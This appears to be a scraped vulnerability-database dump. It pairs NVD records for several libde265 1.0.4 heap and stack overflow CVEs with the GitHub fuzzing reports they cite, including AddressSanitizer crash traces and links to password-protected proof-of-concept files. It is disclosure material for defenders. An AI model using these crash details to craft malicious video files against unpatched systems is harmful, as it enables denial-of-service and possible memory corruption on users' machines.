[ "Third Party Advisory" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/237
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in ff_hevc_put_unweighted_pred_8_sse when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-ff_hevc_put_unweighted_pred_8_sse-heap_overflow.crash WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) WARNING: CTB outside of image area (concealing stream error...) ================================================================= ==69912==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e00000fc30 at pc 0x0000004cc8bf bp 0x7ffc1997ee70 sp 0x7ffc1997ee60 WRITE of size 4 at 0x61e00000fc30 thread T0 #0 0x4cc8be in ff_hevc_put_unweighted_pred_8_sse(unsigned char*, long, short const*, long, int, int) /root/src/libde265/libde265/x86/sse-motion.cc:149 #1 0x52bc86 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const ../libde265/acceleration.h:260 #2 0x521301 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:578 #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #4 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #5 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #6 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #7 0x47b611 in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4636 #8 0x47b53f in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4630 #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #20 0x7f931534a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #21 0x402b28 in _start (/root/dec265+0x402b28) AddressSanitizer can not describe address in more detail (wild memory access suspected). SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/x86/sse-motion.cc:149 ff_hevc_put_unweighted_pred_8_sse(unsigned char*, long, short const*, long, int, int) Shadow bytes around the buggy address: 0x0c3c7fff9f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff9f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff9f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff9f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff9f70: 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c3c7fff9f80: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 0x0c3c7fff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff9fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff9fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff9fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff9fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==69912==ABORTING ``` ## POC file [libde265-ff_hevc_put_unweighted_pred_8_sse-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-ff_hevc_put_unweighted_pred_8_sse-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in ff_hevc_put_unweighted_pred_8_sse when decoding file
https://api.github.com/repos/strukturag/libde265/issues/237/comments
3
2019-12-24T11:25:26Z
2023-01-24T18:03:54Z
https://github.com/strukturag/libde265/issues/237
542,098,137
237
2,499
CVE-2020-21599
2021-09-16T22:15:07.880
libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/235" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/strukturag/libde265/issues/235" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00027.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List" ], "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/235
[ "Exploit", "Issue Tracking" ]
github.com
[ "strukturag", "libde265" ]
# heap overflow in de265_image::available_zscan when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-de265_image__available_zscan-heap_overflow.crash WARNING: pps header invalid WARNING: non-existing PPS referenced WARNING: pps header invalid WARNING: non-existing PPS referenced ================================================================= ==50404==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a0000178bc at pc 0x000000443563 bp 0x7fff14a846d0 sp 0x7fff14a846c0 READ of size 4 at 0x62a0000178bc thread T0 #0 0x443562 in de265_image::available_zscan(int, int, int, int) const /root/src/libde265/libde265/image.cc:760 #1 0x443acf in de265_image::available_pred_blk(int, int, int, int, int, int, int, int, int, int) const /root/src/libde265/libde265/image.cc:796 #2 0x521fd7 in derive_spatial_merging_candidates(MotionVectorAccess const&, de265_image const*, int, int, int, int, int, unsigned char, int, int, int, PBMotion*, int) /root/src/libde265/libde265/motion.cc:808 #3 0x525e21 in get_merge_candidate_list_without_step_9(base_context*, slice_segment_header const*, MotionVectorAccess const&, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:1467 #4 0x526732 in derive_luma_motion_merge_mode(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:1570 #5 0x52afb3 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:2029 #6 0x52b8ae in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2103 #7 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310 #8 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #20 0x7f4581a5882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #21 0x402b28 in _start (/root/dec265+0x402b28) 0x62a0000178bc is located 1468 bytes to the right of 20736-byte region [0x62a000012200,0x62a000017300) allocated by thread T0 here: #0 0x7f4582959532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532) #1 0x42447e in __gnu_cxx::new_allocator<int>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104 #2 0x422d9c in std::allocator_traits<std::allocator<int> >::allocate(std::allocator<int>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491 #3 0x420d4f in std::_Vector_base<int, std::allocator<int> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170 #4 0x455ef8 in std::vector<int, std::allocator<int> >::_M_default_append(unsigned long) /usr/include/c++/5/bits/vector.tcc:557 #5 0x455c0c in std::vector<int, std::allocator<int> >::resize(unsigned long) /usr/include/c++/5/bits/stl_vector.h:676 #6 0x451598 in pic_parameter_set::set_derived_values(seq_parameter_set const*) /root/src/libde265/libde265/pps.cc:589 #7 0x450649 in pic_parameter_set::read(bitreader*, decoder_context*) /root/src/libde265/libde265/pps.cc:528 #8 0x40a562 in decoder_context::read_pps_NAL(bitreader&) /root/src/libde265/libde265/decctx.cc:574 #9 0x40dc78 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1244 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f4581a5882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/image.cc:760 de265_image::available_zscan(int, int, int, int) const Shadow bytes around the buggy address: 0x0c547fffaec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c547fffaf10: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa 0x0c547fffaf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fffaf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==50404==ABORTING ``` ## POC file [libde265-de265_image__available_zscan-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-de265_image__available_zscan-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap overflow in de265_image::available_zscan when decoding file
https://api.github.com/repos/strukturag/libde265/issues/235/comments
4
2019-12-24T11:18:40Z
2023-01-24T17:46:14Z
https://github.com/strukturag/libde265/issues/235
542,096,202
235
2,500
CVE-2020-21600
2021-09-16T22:15:07.920
libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/243" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/243" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/243
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-put_weighted_pred_avg_16_fallback-heap_overflow.crash WARNING: pps header invalid WARNING: non-existing PPS referenced ================================================================= ==103499==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005310 at pc 0x000000432cd8 bp 0x7ffe393c5a50 sp 0x7ffe393c5a40 WRITE of size 2 at 0x62a000005310 thread T0 #0 0x432cd7 in put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:246 #1 0x52bc12 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:251 #2 0x52085c in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:513 #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #4 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #5 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #6 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #7 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #8 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #9 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #10 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #11 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #12 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #13 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #14 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #15 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #16 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #17 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #18 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x402b28 in _start (/root/dec265+0x402b28) 0x62a000005310 is located 0 bytes to the right of 20752-byte region [0x62a000000200,0x62a000005310) allocated by thread T0 here: #0 0x7fa640736076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x414467 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2012 #6 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #7 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #8 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #9 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #10 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #11 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:246 put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) Shadow bytes around the buggy address: 0x0c547fff8a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff8a60: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==103499==ABORTING ``` ## POC file [libde265-put_weighted_pred_avg_16_fallback-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_weighted_pred_avg_16_fallback-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file
https://api.github.com/repos/strukturag/libde265/issues/243/comments
4
2019-12-24T11:35:38Z
2023-01-24T18:10:24Z
https://github.com/strukturag/libde265/issues/243
542,100,957
243
2,501
CVE-2020-21601
2021-09-16T22:15:07.963
libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/241" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/241" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
